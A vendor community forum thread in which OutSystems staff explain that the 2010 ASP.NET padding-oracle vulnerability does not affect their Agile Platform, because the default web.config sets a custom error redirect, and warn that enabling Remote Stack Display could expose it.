Skip to Content (Press Enter)
OutSystems.com
Personal Edition
Community
Support
Training
Training
Online Training
Developer Schools
Boot Camps
Certifications
Tech Talks
Documentation
Documentation
Overview
ODC
O11
Forums
Forge
Get Involved
Get Involved
Jobs
Ideas
Members
Mentorship
User Groups
Platform
Platform
ODC
O11
Search in OutSystems
Log in
Get Started
Back to Forums
AcacioPN
Staff
25
Views
1
Comments
ASP.NET / IIS Security Vulnerability - No impact on Agile Platform
Question
Hi everyone
Recently Microsoft released a Security Advisory reporting a security vulnerability in ASP.NET. This vulnerability exists in all versions.
More details can be found in the following links:
https://www.microsoft.com/technet/security/advisory/2416728.mspx
https://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx?mkt_tok=3RkMMJWWfF9wsRonuq/LZKXonjHpfsX64u4rUKa2lMI/0ER3fOvrPUfGjI4GRMN0dvycMRAVFZl5nQhXDu6QaI5V8fA%3D
This vulnerability makes it possible, in affected systems, to request and download protected files (such as web.config) and decrypt data from encrypted ViewState. The vulnerability exists because, in response to specific requests, ASP.NET will return custom error codes, which enable an attacker to gather information allowing them to obtain the remaining of the cypher.
The workaround for this particular problem is to set a default redirect for all custom errors in ASP.NET.
OutSystems Agile Platform already has the suggested workaround applied
. By default, all eSpaces have the following content in web.config:
<customErrors mode="RemoteOnly" defaultRedirect="/customHandlers/internalerror.aspx">
<error statusCode="404" redirect="/customHandlers/notfound.aspx"/>
</customErrors>
<customErrors mode="RemoteOnly" defaultRedirect="/customHandlers/internalerror.aspx">
<error statusCode="404" redirect="/customHandlers/notfound.aspx"/>
</customErrors>
This is valid for all currently supported versions (4.2, 5.0, 5.1) and even for some older versions (at least 4.1 and 4.0 have this code built-in). So unless you remove them explicitly (with FactoryConfiguration solution) your eSpaces in IIS should be well protected.
If you have any additional questions you would like to ask regarding this vulnerability and the Agile Platform, feel free to post them here.
Miguel João
Staff
Hi All
One final note on this subject.
If you enable the Remote Stack Display setting on your espace detail operation's settings you might get affected by this security vulnerability, before it will show the full error dump and content to users accessing the web pages remotely.
As long as you keep this setting unchecked (which is the default value on Agile Platform), it shouldn't be a problem.
Cheers
Miguel Simões João
Community Guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting.
See the full guidelines
Loading...